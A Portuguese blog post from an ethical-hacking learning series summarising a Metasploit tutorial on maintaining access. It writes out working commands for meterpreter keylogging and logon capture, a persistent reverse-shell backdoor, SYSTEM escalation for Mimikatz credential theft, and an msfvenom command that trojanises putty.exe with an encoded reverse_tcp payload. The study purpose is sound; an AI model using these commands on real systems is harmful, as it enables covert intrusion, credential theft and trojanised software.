DIA#29-Ethical Hacking Tools (Metasploit- Manter Acesso && Funcionalidades Extra da MSF)

    Hoje continuo com o tutorial da Offensive Security, desta vez o que fazer para manter acesso do target e funcionalidades extra da MSF.

Manter Acesso    

Keylogger

    Após obter acesso a uma máquina, normalmente é boa ideia manter esse acesso para fazer uma análise mais aprofundada. Uma ferramenta usada para essa análise é um keylogger, que permite registar todo o input do teclado, sem escrever nada no disco e deixando vestígios mínimos. 
    Um exemplo de uso do keylogger encontra-se disponível no tutorial, em que primeiro faz-se exploit do sistema como normalmente com o módulo "warftpd_165_user", de seguida migra-se o processo "Explorer.exe" e finalmente corre-se o keylogger usando "keyscan_start" e depois "keyscan_dump" para despejar o que foi escrito. Se o attacker quiser retirar informação do logon basta migrar para o processo "winlogon.exe" em vez do anterior.

Backdoors Persistentes

    De modo a continuar a ter acesso mesmo depois de patches é importante criar um Backdoor Persistente.
     Um exemplo de uso de Backdoor Persistente encontra-se no tutorial, mas antes de mais é necessário ter em atenção que no backdoor do exemplo não requer autenticação pelo que qualquer pessoa pode aceder a esse backdoor, normalmente é melhor optar por uma opção que permita ter autenticação.
    Para estabelecer este Backdoor Persistente começa-se com "run persistence -h" numa sessão meterpreter e coloca-se, por exemplo, "run persistence -U -i 5 -p 443 -r 192.168.1.71". De seguida para verificar que funciona faz-se "reboot" e "exit", posteriormente faz-se o setup do handler em que se usa o módulo "ms08_067_netapi", onde se coloca "use exploit/multi/handler" com payload de "/meterpreter/reverse_tcp", um LHost e LPort. Depois disto se o utilizador fizer logon no sistema, uma sessão meterpreter será aberta.

Funcionalidades Extra da MSF

    A MSF está constantemente em evolução, incorporando frequentemente ferramentas criadas por utilizadores. De seguida vão-se dar exemplos de de algumas dessas ferramentas:

Mimikatz

    "Mimikatz" é uma ferramenta que aglomera um conjunto de ferramentas usadas para conseguir obter uma posição mais firme no sistema comprometido. 
    Esta ferramenta irá correr numa sessão meterpreter no target, com privilégios ao nível de Sistema, para isso utiliza-se os comandos da seguinte imagem.
  
meterpreter > getuid
Server username: WINXP-E95CE571A1\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

    Depois de obter as permissões de sistema, irá-se confirmar com "sysinfo" a arquitectura do target, isto é relevante uma vez que, em maquinas de 64bits pode-se ter comprometido um processo de 32bits numa arquitetura de 64bits, fazendo com que o meterpreter faça load na memória da versão do "mimikatz" de 32bits, oque vai causar que a maioria das funcionalidades não funcionem.
    Seguidamente irá utilizar-se o "mimikatz" em si, para ver como usar recomendo ir a "https://www.offensive-security.com/metasploit-unleashed/mimikatz/". 
    Disclaimer, esta ferramenta encontra-se numa mistura de inglês e francês consoante o comando utilizado.

Ficheiros Executáveis para Backdoor

    Com esta esta ferramenta é possível colocar backdoors em todos os ficheiros executáveis, como por exemplo iexplorer.exe, explorer.exe, putty, etc.
    No exemplo apresentado começou-se por fazer download do executável legitimo do putty, que se fez com "wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", de seguida usa-se "msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe" para injectar a payload "reverse_tcp" do meterpreter no executável, com o modo de encriptação "shikata_ga_nai" e grava ficheiro com backdoor na directoria webroot. Como se utiliza uma payload de reverse merterpreter é necessário utilizar o "/multi/handler" que se usa da seguinte maneira.
   
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

    Quando a vitima executar a versão comprometida do Putty, aparece uma sessão meterpreter do target.


PS.

Comentários

Mensagens populares deste blogue

DIA#36-OverTheWire-Bandit (LVL 2)

DIA#45-OverTheWire-Bandit (LVL 11)

DIA#52-OverTheWire-Bandit (LVL 18)